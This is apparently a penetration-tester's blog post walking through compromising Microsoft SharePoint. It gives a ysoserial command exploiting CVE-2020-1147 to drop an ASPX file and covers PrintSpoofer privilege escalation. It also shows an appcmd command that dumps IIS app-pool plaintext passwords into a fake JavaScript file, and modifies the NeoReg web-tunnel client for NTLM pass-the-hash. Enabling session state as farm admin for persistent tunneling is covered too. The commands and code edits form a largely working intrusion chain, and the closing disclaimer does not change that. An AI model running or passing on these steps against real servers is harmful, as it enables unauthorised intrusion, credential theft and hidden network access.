Hello dear friends. Today we are going to explore some particular cases when targeting Sharepoint instances along your way in Pentests/Red Team exercises. When I faced this suite for the first time, I noticed that there is a lot of information that can help us, but it is spread among multiple sources, so I wanted to share my own compilation combined with my research work.

As you may know, Microsoft Sharepoint is a web-based collaborative platform that integrates with Microsoft Office. Primarily sold as a document management and storage system, the product is highly configurable and usage varies substantially among organizations. Focusing on what is of our interest, this is a web-driven suite usually accessed by authenticated corporate users and known to suffer from a myriad of CVE reported issues if not patched. These last ones lead to Remote Code Execution (RCE) and ultimately allow attackers to compromise the server instance. Sounds like a good target to compromise.

However, the complete exploitation process is not always straightforward and we may find some difficulties when trying to escalate privileges or set up some persistence implants. We are going into detail in the following sections.

Intel Report

First of all, let's explore the latest RCE issues with their exploitation process explained somewhere:

As you may noticed, all of these vulnerabilities can provide command execution to attackers, but they require authenticated access by default. Since most Sharepoint instances are connected to Active Directory and we assume no access to the complete list of users, the most suitable approach in this case would be user gathering from OSINT resources and then Password Spraying against authenticated Sharepoint endpoints. Another option would be to fuzz endpoints using specific wordlists like SecLists and try to find unauthenticated content, hopefully finding vulnerable endpoints or information disclosure issues regarding AD users. This already happened in real cases, such as with the U.S. Dept Of Defense.

We won't go into much detail with user gathering. I just want to note the obvious but most important thing: the more complete the user list is, the greater are the chances to get in. At this point you surely have the basic information to make a good user list: user syntax (name.surname, n_surname, etc) disclosed in metadata and user databases (company website or directories, LinkedIn, Search Engines, etc).

Dorks in Search Engines are quite powerful. They can serve you well if used wisely not only for user enumeration, but also for endpoint discovery. Some endpoint instances host more than one site, and they are not necessarily configured the same way.

Endpoint discovery using dorks.
Endpoint discovery using dorks.

Once we get authenticated access, we can proceed with the exploitation itself.

Pwning Sharepoint from your home

For sake of simplicity we are going to work with CVE-2020-1147 as it is implemented in Ysoserial.NET, a fantastic tool to craft .NET serialized gadgets with custom payloads.

Ysoserial's SharePoint payloads.
Ysoserial's SharePoint payloads.

There are a couple of ways to check if an asynchronous blind RCE succeeded. We can issue web requests with a custom domain pointing to our server and see if they reach it. We can even set up a non-authoritative DNS domain to see wether DNS requests can be leaked in case HTTP requests are not being received.

The _layouts folder trick

If none of these methods work we can try to write a proof file into one of the web directories and check its existence. Although default Sharepoint configurations don't allow write access to web folders, sometimes sysadmins relax these restrictions to meet application requirements, so it worths trying.

A bit of research revealed that Sharepoint does not handle web files directly. However, there are some special cases such as the _layouts folder where files can be requested directly. The best part of using this folder is that ASPX files are not subject to restriction as it happens with user pages, which are stored in the database and include the inability to use code blocks or include files from the file system, as already explained in CVE-2020-1181.

From now on, all practical explanations will be based in the testing Sharepoint 2016 VM available here. We will try to upload some testing code to check if we can write into the _layouts folder with the current IIS Pool user.

<%@ Import Namespace="Microsoft.SharePoint" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<%= "testprint" %>

The _layouts folder is located at C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\proof.aspx in the file system (note that the 16 folder is version-dependent, in this case it matches Sharepoint 2016), so we launch Ysoserial.NET using the following command:

.\ysoserial.exe -p Sharepoint --cve=CVE-2020-1147 -c 'echo ^<^%@^ Import^ Namespace="Microsoft.SharePoint"^ ^%^>^ ^ ^<^!DOCTYPE^ html^ PUBLIC^ "-//W3C//DTD^ XHTML^ 1.0^ Strict//EN"^ "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"^>^ ^<html^>^ ^<head^>^</head^>^ ^<body^>^ ^<^%=^ "testprint"^ ^%^>^ ^</body^>^ ^</html^> > "C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\proof.aspx"'

It is a common practice to use the same Sharepoint instance for multiple sites mapped to different domains or subdomains. Another advantage from uploading ASPX files to _layouts is that we don't need to find the correct site since all of them have access to this folder. In our example, one valid URL would be http://intranet.sp2016gm.dev/_layouts/15/proof.aspx:

Simple PoC demostrating RCE.
Simple PoC demostrating RCE.

This way we confirmed Code Execution capabilities, so we can proceed to the next step.

Domain accounts in Cl34rt3xt

But wait a minute... do we really need to PrivEsc? That's a nice question. If you managed to confirm code execution and HTTP outbound connectivity, probably the best way to continue would be with a C2 HTTP implant. If your favourite C2 has proxy functionality then you may have a nice persistence with command execution and traffic tunneling capabilities, leaving PrivEsc as unnecessary.

However, if the server is unable to perform outbound connections, there are important sub-goals we can achieve after successful Privilege Escalation in a Sharepoint machine:

Privilege Escalation techniques in Windows can be very wide, but when we face a well-configured Windows Server 2019 instance, things can become hard. Still, there is one technique that should work fine considering that our IIS Pool account probably has the SeImpersonatePrivilege privilege enabled: the PrintSpoofer bug.

It is worth to mention that the Delegate 2 Thyself technique could also work, but the Sharepoint server must meet two requirements: it has to be adhered to a Windows domain, and the Pool account must be a local service account. In my experience, IIS Pool accounts in Sharepoint instances are usually associated to domain user accounts, which makes this path unfeasible, but if you find a case where a local account is used (i.e. iis apppool\defaultapppool) you could give it a try.

To go through the PrintSpoofer bug, you can get the PoC from itm4n's git repo or the SweetPotato project. The tool needs to be modified to avoid AV detections and then uploaded to the target, a process which I will not utter here. Once the tool is ready, to confirm that the PrivEsc is working, we are going to get the Pool account plaintext password and write it into the layouts folder so we can read it even if no outbound connection is available. The basic appcmd command would be the following:

c:\windows\system32\inetsrv\appcmd.exe list apppool  /text:* | findstr "userName password" > "C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\share.js"

Remember that this command must be launched using the PrintSpoofer tool, and wrap the entire command in Ysoserial to trigger it through serialization as explained earlier. Output will be written into the layouts folder as a fake JS file named share.js. If everything went as expected, all the service accounts configured in IIS should be displayed when opening the dump file (remember to delete the file ASAP, and don't even try this in a customer's environment without encrypting these contents first).

Username and p4ssword extraction.
Username and p4ssword extraction.

At this point we should have both command execution and privilege escalation in place. If we didn't get a C2 implant with proxy capabilities working, we need to proceed with the Web Tunneling step.

Web Tunneling in overdrive

Originally, web tunnels were configured using customized versions of ReGeorg which did a good job. This made people to create their own versions taking the original code as the base, until some time ago a new project called Neo-Regeorg or NeoReg appeared with a bunch of new functions and improvements.

Basic usage in NeoReg is pretty straightforward: it has one command to generate the web files using the specified key to encrypt its content (useful against non-HTTP connections and packet inspection).

$ python neoreg.py generate -k sup3rs3cr3tp4ss
[+] Mkdir a directory: neoreg_servers
    [+] Create neoreg server files:
       => neoreg_servers/tunnel.ashx
       => neoreg_servers/tunnel.aspx

The .aspx file would be the one to be written into the layouts folder now that we have privileges to do so. Once the web file is generated and uploaded into the target, there last command establishes connection and sets up the proxy port in our local machine:

$ python3 neoreg.py -k sup3rs3cr3tp4ss -u http://intranet.sp2016gm.dev/_layouts/15/tunnel.aspx

However, there are two problems we are going to face if we try to use ReGeorg/NeoReg in a Sharepoint instance: NTLM Authentication and Session State.

NTLM Authentication

The first problem we are facing is web NTLM Authentication. Although there is a flag to add headers which can be used to set a fixed Authorization header, in the case of NTLM this is not enough as it changes dynamically with its challenge-response model.

 $ python3 neoreg.py -k sup3rs3cr3tp4ss -u http://intranet.sp2016gm.dev/_layouts/15/tunnel.aspx
 Tunnel at:
[ERROR   ]  Georg is not ready, please check URL and KEY. rep: [401] Unauthorized

To fix this, we can implement a small new functionality to handle NTLM authentication by taking advantage from the existing requests-ntlm2 Python library. It can be installed with pip:

pip install requests-ntlm2

In the Python client file neoreg.py we can use hardcoded credentials as a first approach to check if it is working. Only three lines are required to implement authentication using this library: the import sentence at line 17 and the auth item itself at lines 720-721.

17.         from requests_ntlm2 import HttpNtlmAuth
717.        conn.headers['Accept-Encoding'] = 'gzip, deflate'
718.        conn.headers['User-Agent'] = USERAGENT
720.        auth=HttpNtlmAuth('gmsp2016.dev\\sp_services','pass@word1')
721.        conn.auth=auth

If for some reason the cleartext password is not known but we have the NTLM hash, it can be used directly. It is not a well documented function, but digging around into the code shows that Pass the Hash is already implemented in this library. GitHub itself is a nice tool to trace code as it is capable of matching function definitions between files.

We start by looking at requests_ntlm2.py file until the first reference to header negotiation appears.

Reference in requests_ntlm2.py.
Reference in requests_ntlm2.py.

Next file to be inspected is dance.py inside the same project. The HttpNtlmContext class is wrapping its namesake in the ntlm_auth project, which is the base of this one.

Reference in dance.py.
Reference in dance.py.

We move to ntlm.py file in the original ntlm_auth project referred in HttpNtlmContext until we see the next reference to the challenge authentication message, pointing to ntlm_auth/messages.py.

Reference in ntlm_auth/messages.py.
Reference in ntlm_auth/messages.py.

We reach the point where username and password is being computed, but we need to dive in deeper detail that we can get from ntlm_auth/compute_response.py.

Reference in ntlm_auth/compute_response.py.
Reference in ntlm_auth/compute_response.py.

The compute_response.py file has another reference to the _ntowfv2 function in ntlm_auth/compute_hash.py.

Reference in ntlm_auth/compute_response.py.
Reference in ntlm_auth/compute_response.py.

Finally we reach the low-level detail at compute_hash.py, and here is where the magic happens. If the password string matches a full NTLM hash, no transformation is applied and the library just split LM and NT hashes to take the lattest.

Reference in ntlm_auth/compute_hash.py.
Reference in ntlm_auth/compute_hash.py.

This operation takes place in the _ntowfv1 function, but if we take a look to _ntowfv2 which is the one we came from, we can see that it follows the same path since it calls _ntowfv1 to get the digest.

The function _ntowfv2 points to _ntowfv1.
The function _ntowfv2 points to _ntowfv1.

You can test it by putting the NTLM hash instead of the plaintext password in the authentication line.

720.     auth=HttpNtlmAuth('gmsp2016.dev\\sp_services','908E2A7188837309B262350F152C6028:BA03A114DEF8D5C913983436960E592C')

This point is quite useful if you get NTLM hashes from SAM / LSASS dumps or the Internal Monologue Attack. Note that in the last case, the NetNTLMv1 hash must be cracked into NTLM first.

Dealing with Session State

Authentication was the first obstacle, but there is another remaining. ReGeorg/NeoReg needs a feature called Session State to store some persistent information across web requests such as socket handlers used to proxy internal connections. Session State is enabled in most IIS configurations, but it comes disabled by default in Sharepoint instances.

One 'noob programmer' idea that came to my mind to fix this was to find a way of serializing the socket to pass this information to the Python client, then specifying the socket in each request so the server didn't have to remember this info. Unfortunately, sockets are not serializable.

Knowing this information, the only option remaining was to enable session state. Probably, previous consent from the customer will be required here since we are going to change configuration parameters in a production environment. Sharepoint comes with its own Powershell cmdlets to make this kind of operations easier.

Add-PsSnapin Microsoft.SharePoint.PowerShell; Enable-SPSessionStateService -DefaultProvision

I advance you that if you try to launch this command from Ysoserial payloads, the webshell or even SYSTEM with the Potato exploit, the server will deny your request with the following message:

<Objs Version="" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Enable-SPSessionStateService : You need to have Farm administrator priviliges 

Fortunately, we have the SP_Farm account from the appcmd.exe command, so we can use it to solve privilege issues. To impersonate the farm user in a non-interactive environment, RunAsCs project can help us to create an Interactive process token (logon type 2) to launch the command without too much trouble. Note that the Powershell command has been encoded in Base64 to prevent issues with special chars and command line terminators.


No output will be received from this command, but it could be modified to include STDOUT redirection in the Powershell command to write it into a file so it can be checked later. If everything went fine, Session State should be enabled now in the Sharepoint instance.

There is one last thing to care about. As explained in the official Microsoft documentation:

"When you use a session-state mode other than InProc, the session-variable type must be either a primitive .NET type or serializable. This is because the session-variable value is stored in an external data store. For more information, see Session-State Modes."

Despite failing miserably when trying to serialize sockets, in the end I got valuable information. NeoReg will fail again if we try to use it right now, but we know why: Session State is enabled with the external data store mode by default, which cannot handle socket serialization, so we must change it for the InProc mode. We can achieve this by adding the <sessionState> config in the web.config file corresponding to the Sharepoint app we are using:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
	<sessionState mode="InProc" timeout="25"></sessionState> 

Normally, Sharepoint servers will handle web.config modifications automatically, so there is no need to restart any service. After that, NeoReg should finally work, allowing us to configure a proxy tunnel even in the most lone Sharepoint. It's up to my dear reader which steps are taken from now on.

Be gentle.



In this post we have demonstrated that Sharepoint instances are attractive assets for atackers when exposed, even in those cases where only the HTTP or HTTPS port is reachable and credentials are required. If this software is not properly patched, critical vulnerabilities can be handful for malicious actors to get control of the affected servers. Even though the vulnerabilities mentioned here are somewhat outdated right now, there are high chances of finding instances that are not fully patched. Moreover, new CVEs will be potentially disclosed in the future such as CVE-2021-1707, so the gates will be continuously opened for this exploitation path.

C2 tools like Cobalt Strike are very suitable in those cases where HTTP outbound connections are possible. It provides not only command execution, but also a lot of tools that can be launched in-memory without privilege escalation, such as reverse proxies to get a tunnel to the internal network.

If we find the Lone Sharepoint which has no outbound connectivity, it is still possible to set up persistences in the form of web-based applications. With a bit of extra effort, we have demonstrated that even Web Tunneling is possible in tough cases.



The contents explained in this article are oriented to academic purposes and must not be used without customer's permission, or followed literally in real life security projects. It's up to the reader to investigate how to adapt these cases to their particular needs.